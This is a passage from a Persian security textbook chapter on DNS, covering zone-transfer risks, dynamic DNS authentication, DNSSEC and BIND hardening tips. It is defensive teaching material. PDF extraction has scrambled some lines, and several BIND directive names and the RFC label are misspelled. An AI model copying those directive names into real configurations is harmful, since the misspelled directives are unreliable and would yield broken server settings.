ﻣﻲﮔﻴﺮﺩ .ﺳﻴﺴﺘﻢ TCPﻧﻴﺰ ﻏﺎﻟﺒﹰﺎ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻪ ﺗﺒﺎﺩﻝ ﺩﺍﺩﻩﻫﺎﻱ ﺯﻳﺎﺩ ،ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﭘﺎﻳﺪﺍﺭ ﻧﻴـﺎﺯ ﺩﺍﺭﻧـﺪ -ﻛـﻪ
ﻫﻤﺎﻥ ﺍﻧﺘﻘﺎﻟﻬﺎﻱ ﻧﺎﺣﻴﻪ ﻣﻲﺑﺎﺷﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦquery ،ﻫﺎﻱ ﻣﻨﻔﺮﺩ ﻫﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ TCPﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﺍﻧﺘﻘﺎﻝ ﻧﺎﺣﻴﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻣﺨﺎﻃﺮﺓ ﺍﻣﻨﻴﺘﻲ ﻣﺤﺴﻮﺏ ﺷﻮﺩ ،ﭼﺮﺍﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻓﻬﺮﺳﺖ ﻛﺎﻣﻠﻲ ﺍﺯ ﻫﻤﺔ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺘﺼﻞ ﺑـﻪ ﺷـﺒﻜﺔ ﺩﺍﺧﻠـﻲ
ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺑﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﺧﺎﺭﺟﻲ ﺍﺭﺍﺋﻪ ﻛﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎ ﺑﻪ ﺑﺴﺘﻪﻫﺎﻱ DNSﻛﻪ ﺍﺯ ﭘﺮﻭﺗﻜﻞ UDPﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺍﺟﺎﺯﺓ ﻋﺒـﻮﺭ
ﺍﺯ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺭﺍ ﻣﻲﺩﻫﻨﺪ ،ﺍﻣﺎ ﺻﺮﻳﺤﹰﺎ ﺍﻧﺘﻘﺎﻝ ﻧﺎﺣﻴﻪ DNSﻛﻪ ﻣﻨﺒﻊ ﺁﻥ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺧﺎﺭﺟﻲ ﺑﺎﺷﺪ ﺭﺍ ﻣﺴﺪﻭﺩ ﻣﻲﻧﻤﺎﻳﻨﺪ.
ﺍﻳﻦ ﻃﺮﺍﺣﻲ ،ﺍﻧﺘﺨﺎﺑﻲ ﻣﻴﺎﻥ ﺍﻳﻤﻨﻲ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺳﺖ؛ ﭼﻮﻥ ﺩﺭ ﺁﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﺁﺩﺭﺱ IPﻫﺮ ﺭﺍﻳﺎﻧﺔ ﺩﺍﺧﻠـﻲ ﺭﺍ
ﺑﻴﺎﺑﻨﺪ ،ﺍﻣﺎ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻧﺎﻡ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺍﺯ ﻗﺒﻞ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺑﺎ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﺍﺗﺼﺎﻻﺕ TCPﺭﻭﻱ ﭘﻮﺭﺕ ۵۳ﻏﺮﺑﺎﻝ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺟﻠﻮﻱ ﺍﻧﺘﻘﺎﻟﻬﺎﻱ
ﻝ ﺑﻪ ﻧﺎﻡ " "allow-transfersﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﻛﻪ ﺷـﻤﺎ ﻧﺎﺣﻴﻪ ﺭﺍ ﺑﮕﻴﺮﻳﺪ ٢٣٥.ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎ ﹺﻡ ،BINDﻳﻚ ﺭﻭﺍ ﹺ
ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺁﺩﺭﺳﻬﺎﻱ IPﻣﻴﺰﺑﺎﻧﻬﺎﻳﻲ ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺍﻧﺘﻘﺎﻝ ﻧﺎﺣﻴﻪ ﻫﺴﺘﻨﺪ ﺭﺍ ﻣﺸﺨﺺ ﻛﻨﻴﺪ .ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﻫﻨﮕﺎﻣﻲ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ ﻛﻪ
ﺑﺨﻮﺍﻫﻴﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﻛﻪ ﺩﺭﻭﻥ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﻧﻴﺴﺘﻨﺪ ﻣﺠﻮﺯ ﺍﻧﺘﻘﺎﻝ ﺩﺍﻣﻨﻪ ﺑﺪﻫﻴـﺪ ،ﺍﻣـﺎ ﻧﻤـﻲﺧﻮﺍﻫﻴـﺪ ﺳـﺎﻳﺮﻳﻦ ﺍﺯ ﭼﻨـﻴﻦ
ﻗﺎﺑﻠﻴﺘﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ.
ﺳﻪ ﺭﺍﻩ ﻋﻤﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﺭﻱ ﻛﻨﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ،ﺍﻃﻼﻋﺎﺕ ﻧﺎﺻﺤﻴﺢ ﺍﺭﺍﺋﻪ ﻛﻨﺪ:
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻧﻤﺎﻳﻴﺪ ﺍﻃﻼﻋﺎﺕ ﻣﺨﺮﺏ ﺍﻣﻜﺎﻥ ﺭﺍﻩﻳﺎﻓﺘﻦ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺭﺍ ﭘﻴﺪﺍ ﻧﺨﻮﺍﻫﻨﺪ ﻛﺮﺩ) .ﺍﻟﺒﺘﻪ ﻣﻄﻤﺌﻨﹰﺎ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﭼﮕﻮﻧـﻪ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ
ﺧﻮﺩ ﺭﺍ ﺳﺎﺧﺘﻪ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩﻩﺍﻳﺪ ﻭ ﺍﻳﻨﻜﻪ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺟﺎﺯﺓ ﺍﻧﺠﺎﻡ ﭼﻪ ﻛﺎﺭﻫﺎﻳﻲ ﺭﻭﻱ ﺷﺒﻜﻪ ﺩﺍﺩﻩﺍﻳﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﺭﺍﻩﺣﻞ ﭼﻨﺪﺍﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﻛﺎﺭﮔﺸﺎ ﻧﺒﺎﺷﺪ!(
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ DNSﭘﻮﻳﺎ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺟﺪﻳﺪ DNSﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﭘﻮﻳﺎﻱ ﺟﺪﺍﻭﻝ DNSﺩﺍﺭﻧﺪ .ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻫﻨﮕـﺎﻣﻲ ﺑﻜـﺎﺭ ﻣـﻲﺁﻳﻨـﺪ ﻛـﻪ
ﺁﺩﺭﺳﻬﺎﻱ IPﺑﺼﻮﺭﺕ ﭘﻮﻳﺎ ﺗﺨﺼﻴﺺ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﻳﺎ ﻣﻴﺎﻥ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩﺍﻧﺪ DNS .ﭘﻮﻳﺎ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑـﺪﻭﻥ
ﻲ ﺩﺍﻣﻨﻪ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺘﻮﺍﻥ ﺟﺪﺍﻭﻝ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ DNSﺩﺭﺣـﺎﻝ ﺍﺟـﺮﺍ ﺭﺍ uploadﻛﺮﺩﻥ ﺩﺳﺘﻲ ﻳﻚ ﻓﺎﻳﻞ ﻣﺘﻨ ﹺ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﺮﺩ .ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎﻱ ﻣﺨﺮﺏ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ.
ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﺑﻮﺩﻥ ،ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎﻱ ﭘﻮﻳﺎﻱ DNSﻫﺎ ﺑﺎﻳﺪ ﺑﺪﺭﺳﺘﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺷـﻮﻧﺪ .ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ ﻣﻬـﺎﺟﻢ ﺑـﺴﺎﺩﮔﻲ ﺑـﺎ ﺗﻐﻴﻴـﺮ
ﻧﮕﺎﺷﺖ ﻣﻴﺎﻥ ﻧﺎﻣﻬﺎﻱ ﺩﺍﻣﻨﻪ ﻭ ﺁﺩﺭﺳﻬﺎﻱ IPﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺒﻜﺔ ﺷﻤﺎ ﺭﺍ ﻣﻮﺭﺩ ﺗﻬﺎﺟﻢ ﻗﺮﺍﺭ ﺩﻫـﺪ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ
DNSﭘﻮﻳﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺁﺩﺭﺱ IPﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﻣﺸﺘﺮﻙ ﻭ ﻳﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻴﻬﺎﻳﻲ ﻛـﻪ ﻃﺒـﻖ ﻳـﻚ
ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﻪ ﺍﻣﻀﺎ ﺭﺳﻴﺪﻩﺍﻧﺪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ )ﺩﺭ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺗﻨﻬﺎ ﺁﺩﺭﺳﻬﺎﻱ IPﺧﺎﺻﻲ ﻣﺠﺎﺯ ﺑﻪ ﺍﺭﺍﺋﻪ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻴﻬﺎ ﻫـﺴﺘﻨﺪ( .ﺩﺭ ﺣﺎﻟـﺖ
ﻛﻠﻲ ﺍﺩﻏﺎﻡ ﺁﺩﺭﺱ IPﻣﻨﺒﻊ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺩﻭ ﺭﻭﺵ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺑﺎﻻﺗﺮﻱ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ.
ﺍﮔﺮ ﻗﺎﺑﻠﻴﺖ DNSﭘﻮﻳﺎ ﺑﺪﺭﺳﺘﻲ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﺸﺪﻩ ﺑﺎﺷﺪ ﻭ ﺷﻤﺎ ﺁﻧﺮﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ ،ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ ﻭ ﺩﺳﺘﺮﺳـ ﹺ
ﻲ ﺍﻳﺠـﺎﺩ
ﻲ ﺗﻐﻴﻴ ﹺﺮ ﺑﺪﺧﻮﺍﻫﺎﻧـﺔ DNSﭘﻮﻳـﺎ ﺭﻧـﺞ
ﺗﻐﻴﻴﺮ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﺍﺯ ﺣﻤﻼﺕ ﻣﺘﻮﺍﻟ ﹺ
ﻣﻲﺑﺮﻧﺪ.
DNSSEC
RFP) DNSSECﺷﻤﺎﺭﺓ ۲۵۳۵ﻭ (۳۱۳۰ﻳﻚ ﮔﻮﻧﺔ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﺔ DNSﺍﺳﺖ ﻛﻪ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ﻣﺒﺘﻨـﻲ ﺑـﺮ DNSﻭ
ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﭘﺎﺳﺨﻬﺎﻱ DNSﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ DNSSEC .ﻳﻚ ﭘﺮﻭﺗﻜـﻞ ﭘﺮﻃﺮﻓـﺪﺍﺭ ﺍﺳـﺖ .ﻃﺮﻓـﺪﺍﺭﺍﻥ ﺍﻳـﻦ
ﭘﺮﻭﺗﻜﻞ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭﻧﺪ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺭﻭﺵ ﺳﺎﺩﻩﺍﻱ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩ PKIﺍﺳﺖ ﻛﻪ ﺑﻪ ﮔﻮﺍﻫﻲﻫﺎﻱ ﮔﺮﺍﻧﻘﻴﻤﺖ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ
ﮔﻮﺍﻫﻲ ﻣﺘﻤﺮﻛﺰ ﻓﺮﻭﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ ﻭﺍﺑﺴﺘﮕﻲ ﻧﺪﺍﺭﺩ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﻌﻠﺖ ﻃﺒﻴﻌﺖ ﺷﻬﺮﺕﻃﻠﺐ DNSSECﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻛـﻪ ﻛـﺎﺭﺑﺮﺩ ﺁﻥ ﺩﺭ
ﻣﺤﻴﻄﻬﺎﻱ ﺗﺠﺎﺭﻱ ﺩﺍﺭﺍﻱ ﺳﻮﺩﺁﻭﺭﻱ ﭼﻨﺪﺍﻧﻲ ﻧﻴﺴﺖ ،ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺩﺭ ﺳﻄﺢ ﻭﺳﻴﻊ ﺗﻼﺵ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺷﺪﻩ ﺍﺳﺖ.
ﺑﺎ ﺑﻜﺎﺭ ﺑﺴﺘﻦ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺣﺘﻤﺎﻝ ﺩﺳﺘﻜﺎﺭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻴﺪ:
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﻳﺪ ﻛﻪ ﻛﻪ ﻓﺎﻗﺪ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺑﺎﺷﺪ. •
ﭼﻨﺎﻧﭽﻪ ﻣﺠﺒﻮﺭ ﻫﺴﺘﻴﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻌﻤﻮﻟﻲ ﺍﺳﺖ ،ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ •
ﻛﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﺎﻓﻈﺖ ﻣﻲﺷﻮﻧﺪ .ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻧـﺎﻡ ﺷـﻤﺎ
٣٧٥ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻣﻲﺗﻮﺍﻧﺪ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﺷﻮﺩ ﻛﻪ ﺑﺎ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻓﺎﻗﺪ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ )ﻣﺜﻞ ﻧﺴﺨﻪﻫـﺎﻱ ﺟﺪﻳـﺪ ،(BINDﺑﺎﻳـﺪ ﺍﺯ
ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺭﺍ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺁﻥ ﻛﺎﺭﺑﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻧﻤﺎﻳﻴﺪ.
ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻣﺤﺪﻭﺩﺷﺪﺓ chroot jailﺳﻴﺴﺘﻢ ﻓﺎﻳـﻞ ﺍﺟـﺮﺍ ﺷـﻮﺩ )ﻣﺜـﻞ ﻧـﺴﺨﻪﻫـﺎﻱ ﺟﺪﻳـﺪ •
ﻲ ﺁﻥ ﺑﻪ ﺩﻳﮕﺮ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻥ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
،(BINDﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﮔﺰﻳﻨﻪ ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳ ﹺ
٢٣٧
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺧﻮﺩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﻣﺤﺪﻭﺩﺓ ﺁﺩﺭﺳـﻬﺎﻱ IPﺟﻌﻠـﻲ ﺭﺍ ﺭﺩ ﻛﻨـﺪ .ﺩﺭ •
ﺳﻴﺴﺘﻢ ،BINDﺩﺳﺘﻮﺭ blackholeﺩﺭ ﻓﺎﻳﻞ named.confﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺑﻜﺎﺭ ﺁﻳﺪ.
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲquery ،ﻫﺎﻱ ﺑﺎﺯﮔﺸﺘﻲ ﻭ ﺗﻜﺮﺍﺭﺷـﻮﻧﺪﺓ DNSﺭﺍ ﺑـﻪ •
ﺍﺟﺮﺍ ﺩﺭ ﻧﻴﺎﻭﺭﺩ .ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﻤﺎ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺗﻘﺎﺿﺎ ﻧﺘﻮﺍﻧﺪ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺑﻴﺎﺑﺪ ،ﺁﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ
ﺧﻮﺩ queryﻫﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺒﺪﻳﻞ ﻧﺎﻡ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ queryﻫﺎﻱ ﺑﺎﺯﮔﺸﺘﻲ ﻣﻨﺎﺑﻊ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻧـﺎﻡ ﺭﺍ ﺑﻜـﺎﺭ
ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﻟﺬﺍ ﻧﺒﺎﻳﺪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﺩﺭ ﺳﻴﺴﺘﻢ ،BINDﺩﺳـﺘﻮﺭ allow-recurtionﻣـﻲﺗﻮﺍﻧـﺪ
ﺑﺮﺭﺳﻲ ﻛﻨﺪ ﻛﻪ ﻛﺪﺍﻡ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ queryﻫﺎﻱ ﺑﺎﺯﮔﺸﺘﻲ ﺻﺎﺩﺭ ﻛﻨﺪ.
ﺍﮔﺮ ﭘﺎﻳﮕﺎﻩ ﺧﺎﺻﻲ ﺭﺍ ﻣﻲﺷﻨﺎﺳﻴﺪ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﺩ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺷﻤﺎ ﺣﻤﻠﻪ ﻛﻨﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻥ •
ﻧﺘﺎﻳﺞ queryﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺑﻪ ﺁﻥ ﺍﺯ ﺩﺳﺘﻮﺭ bogsnsﺳﻴﺴﺘﻢ BINDﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﻳﺎ ﻧﺎﻡ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﺭﺍ ﺑﻪ ﻓﻬﺮﺳـﺖ
ﺳﻴﺎﻩ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺧﻮﺩ ﺑﻴﻔﺰﺍﻳﻴﺪ.
ﭼﻨﺎﻧﭽﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ DNSﭘﻮﻳﺎ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﮔﻴﺮﻳﺪ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ﺻﺤﻴﺢ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎ ﻭ ﻳﺎ ﺍﻣﻀﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱﺷﺪﺓ ﺁﻧﻬـﺎ ﺭﺍ •
ﺍﻟﺰﺍﻣﻲ ﻛﻨﻴﺪ ﻭ ﻫﺮﮔﺰ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ IPﻣﺘﻜﻲ ﻧﺒﺎﺷﻴﺪ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻼ ﭼﻨﺎﻧﭽﻪ ﺯﻳﺮﺷﺒﻜﺔ ﺷﻤﺎ ﺍﺯ ﺁﺩﺭﺱ 10.0.0.8ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﺪ ،ﺍﻳﻦ ﺁﺩﺭﺱ ﺩﺭ ﺣﻴﻄﺔ ﺷﺒﻜﺔ ﺷﻤﺎ ﻳﻚ ﺁﺩﺭﺱ ﺟﻌﻠﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
۲۳۷ﻣﺜ ﹰ
٣٧٧ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﻫﻔﺘﻢ
ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ
ﻛﻠﻴﺎﺕ
